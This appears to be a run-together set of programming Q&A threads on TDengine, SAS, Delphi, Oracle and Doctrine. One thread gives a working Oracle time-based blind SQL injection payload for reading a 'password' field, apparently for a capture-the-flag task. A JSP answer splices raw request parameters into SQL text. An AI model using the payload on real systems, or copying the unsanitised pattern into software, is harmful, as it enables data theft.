I am testing some C code that uses the TAOS C API. There is a test that runs SQL through the TAOS_STMT-related API. When I pass "create database testdb;" to that code, which calls taos_stmt_init, taos_stmt_prepare, and taos_stmt_execute in sequence, taos_stmt_execute returns 2147484202 ("Stmt API usage error"). I noticed that in the TAOS C examples, TAOS_STMT only runs DML. Does that mean TAOS_STMT cannot be used to run DDL?
Currently, the taos_stmt_prepare-led API sequence will fail in TDengine if the SQL statement is not a parameterized one.
I think that is the rule for this API.
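As a sketch of the difference (the table name below is made up): the stmt API expects a parameterized statement whose placeholders you bind before executing, while DDL has nothing to bind and should go through taos_query instead.

-- Parameterized DML: prepare with taos_stmt_prepare, bind the ?
-- placeholders with taos_stmt_bind_param, then call taos_stmt_execute
INSERT INTO weather VALUES (?, ?);

-- DDL: no parameters to bind, so execute it directly with taos_query()
CREATE DATABASE testdb;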
When trying to do an SQL injection on an Oracle database, I have the problem that most of the examples in the tutorials do not work. I have already found out that I can only use CASE WHEN a THEN b ELSE c END instead of normal IF statements.
The question I have now is: how do I get a time delay into the injection? Benchmark() and sleep() do not work either.
I already know that the table is named "flag" and that the field I want to read out is named "password".
The only information I get from the database is the time it takes to execute my input (or query, since I bypass the input to inject SQL).
I found the following SQL statement on the web at SQL Injection Tutorial:
select dbms_pipe.receive_message(('a'),10) from dual;
I am not certain I should be participating in this sort of thing, but since I found it with my first Google Search, I will go ahead and post it.
I tested it and it delayed the result by 10 seconds.
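Combined with the CASE trick above, this gives a blind, time-based test. A sketch, guessing the first character of the password (assuming the flag table has a single row; the exact quoting depends on where you inject):

SELECT CASE
         WHEN SUBSTR((SELECT password FROM flag), 1, 1) = 'a'
         THEN dbms_pipe.receive_message('x', 10)
         ELSE 0
       END
FROM dual;

If the response takes about 10 seconds, the guess was right; if it comes back immediately, it was wrong. Repeat for each character position to read out the value.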
I am using SAS Enterprise Guide (EG) 6.1 and want to find out what indexes our Oracle tables have. Is there a way to write a program to get this information?
I tried to do:
LIBNAME DW ORACLE USER='username' PASSWORD='password' PATH='path.world' SCHEMA='schema';
DATA _NULL_ ;
dsid = OPEN(DW.some_table) ;
isIndexed = ATTRN(dsid,"ISINDEX") ;
PUT isIndexed = ;
RUN ;
some_table is the name of my table, but I get an error:
ERROR: DATA STEP Component Object failure. Aborted during the COMPILATION phase.
ERROR 557-185: Variable some_table is not an object.
Reference: https://communities.sas.com/t5/ODS-and-Base-Reporting/check-if-index-exists/td-p/1966
OPEN takes a string or a value that resolves to a string. So you need
dsid= OPEN('dw.some_dataset');
I don't know if you can use that with Oracle or not, and I don't know whether ATTRN will be useful for this particular purpose or not. These all work well with SAS datasets, but it's up to the libname engine (and whatever middleware it uses) to implement the functionality that ATTRN would use.
For example, I don't use Oracle but I do have SQL Server tables with indexes, and I can run the above code on them; the code appears to work (it doesn't show errors) but it shows the tables as being unindexed, when they clearly are.
Your best bet is to connect using pass-through (CONNECT TO ...) instead of libname, and then you can run native Oracle syntax rather than using SAS.
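For example, you could query Oracle's data dictionary through pass-through; here is a sketch that reuses the connection details from your LIBNAME (the schema and table names are placeholders, and the dictionary stores them in uppercase):

PROC SQL;
  CONNECT TO ORACLE (USER='username' PASSWORD='password' PATH='path.world');
  SELECT * FROM CONNECTION TO ORACLE
    ( SELECT index_name, column_name, column_position
      FROM all_ind_columns
      WHERE table_owner = 'SCHEMA'
        AND table_name  = 'SOME_TABLE'
      ORDER BY index_name, column_position );
  DISCONNECT FROM ORACLE;
QUIT;

This lists each index on the table and the columns it covers; no rows back means no indexes (or the wrong schema).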
I am using a SQL Server database, and after running a simple SQL script I would like to know how many records were affected by the last (or only) statement executed in the script.
I cannot find a reference for how to achieve this with Delphi's TADOCommand, and I know SQL Server gives this information to the provider. I am aware of workarounds like getting @@ROWCOUNT in another query, yet this adds overhead and unnecessary complexity.
Thanks.
Do you use the
function Execute(var RecordsAffected: Integer; const Parameters: OleVariant): _Recordset;
version of the Execute method?
From the doc:
RecordsAffected indicates the number of records, if the command operates on data, that are affected by the command after execution.
So that should give you what you need.
Disclaimer: I cannot test this against SQL Server (don't have it).
I am rather new to SAS and I have run into a problem that I think probably has a better solution than what I've found so far.
I need to update an Oracle db table that has around 1 million rows with data from a SAS data set that has about 10,000 records.
I used an update statement within proc sql, but it takes hours to update the Oracle table. Right now, I am loading the data from the SAS data set into a temporary table in the Oracle db and doing a proc sql pass through execute statement to update the main table from the temporary table. This takes only a couple of minutes at most.
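The pass-through execute I run looks roughly like this (with made-up table, column, and connection names):

PROC SQL;
  CONNECT TO ORACLE (USER='username' PASSWORD='password' PATH='path.world');
  EXECUTE (
    MERGE INTO main_table m
    USING temp_table t
    ON (m.id = t.id)
    WHEN MATCHED THEN
      UPDATE SET m.some_col = t.some_col
  ) BY ORACLE;
  EXECUTE (COMMIT) BY ORACLE;
  DISCONNECT FROM ORACLE;
QUIT;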
However, this is rather cumbersome to program, and I need to update the Oracle table from multiple functions within my SAS code.
Is there an analog to JDBC batch updates in SAS (I used to do Java programming before getting involved in SAS)? Something that is faster than an update statement in proc sql, but easier to code than temp table + update via pass-through?
Are you using SAS/Access to connect your SAS sessions to Oracle?
In my situation, I use SAS/Connect JDBC.
SAS/Connect is a very simple but effective strategy for interfacing the SAS substrate system to JEE. Essentially, SAS/Connect is yet another telnet-like implementation by SAS that executes sas -dmr.
I pull the SAS data out through SAS/Connect JDBC into my JSP and then push the data into Oracle or SQL Server using Java programming techniques we are all familiar with.
Read my ancient paper on using SAS/Connect to connect SAS to JEE:
http://www.nesug.org/proceedings/nesug04/ap/ap02.pdf.
BTW do not try to contact me with the contacts listed on the paper - they are ancient.
In response to your further statement:
I thought you wanted a way to use JDBC to insert the data into Oracle?
My paper shows you how to embed a whole block of SAS macro or SQL or any text in a JSP and then submit that block of text to be run through SAS/Connect.
String datasetname = request.getParameter("datasetname");
String where = request.getParameter("where");
<t:text id="macHello">
%macro hello(datasetname);
data &datasetname;
/* code to create your data */
run;
%mend;
%hello(<%=datasetname%>);
</t:text>
sasConnect.submit(macHello);
<t:text id="SQLgetRecs">
SELECT *
FROM <%=datasetname%>
WHERE <%=where%>
</t:text>
ResultSet mydata =
sasConnJDBC.executeQuery(SQLgetRecs);
Then do whatever you need to do in Java: either interweave the Oracle inserts with each iteration of the ResultSet, or iterate over the ResultSet to produce a text block of SQL INSERT VALUES, which you then submit to Oracle JDBC.
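The second route might generate an Oracle multi-row insert along these lines (hypothetical table and values):

INSERT ALL
  INTO target_table (id, name) VALUES (1, 'first')
  INTO target_table (id, name) VALUES (2, 'second')
SELECT * FROM dual;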
It would just be a single JSP, provided you know how to work with JSPs and are willing to understand how the text-block tag library I wrote works. You see, I use this technique to let a JSP run SAS macros that have been running in production batch mode for ages, without any change to the macros. Not only that, the tag lib lets me embed Java and JSP variable resolution into the macros or SAS SQL blocks.
I wrote this block-text tag lib because I used to do such operations in Perl (prior to 2003), where Perl (and other scripting languages) lets you assign a contiguous block of text within the script to a variable.
Instructions on using the tag lib:
http://h2g2java.blessedgeek.com/2009/07/jsp-text-custom-tag.html
http://h2g2java.blessedgeek.com/2009/07/referencing-text-jsp-custom-tag-defined.html
I have been researching a way to get the SQL statements that are built by a generated Migration file. These extend Doctrine_Migration_Base. Essentially I would like to save the SQL as change scripts.
The execution path leads me to Doctrine_Export, which has methods that build the SQL statements and execute them. I have found no way of asking for just the SQL. The export methods in Doctrine_Export only operate on Doctrine_Record models, not Migration scripts.
From the command line './doctrine migrate version#' the path goes:
Doctrine_Cli::run(cmd)
Doctrine_Task_Migrate::setArguments(args)
Doctrine_Task_Migrate::execute()
Doctrine_Migration::migrate(to)
Doctrine_Migration_Process::Doctrine_Export (various create, drop, and alter methods with SQL equivalents)
Has anyone tackled this before? I really would not like to change Doctrine base files. Any help is greatly appreciated.
Could you make a dev server and do the migration on that, storing a SQL trace as you go? You don't have to keep the results, but you would get a list of every command.
Taking into account Rob Farley's suggestion, I modified:
Doctrine_Core::migrate
Doctrine_Task_Migrate::execute
When the execute method is called, the optional argument 'dryRun' is checked. If true, a 'Doctrine_Connection_Profiler' instance is created. The 'dryRun' value is then passed on to the 'Doctrine_Core::migrate' method. A 'dryRun' value of true allows the changes to roll back once the SQL statements have been executed. When the method returns, the profiler is parsed, and non-empty SQL statements not containing 'migration_version' are saved and displayed in the terminal.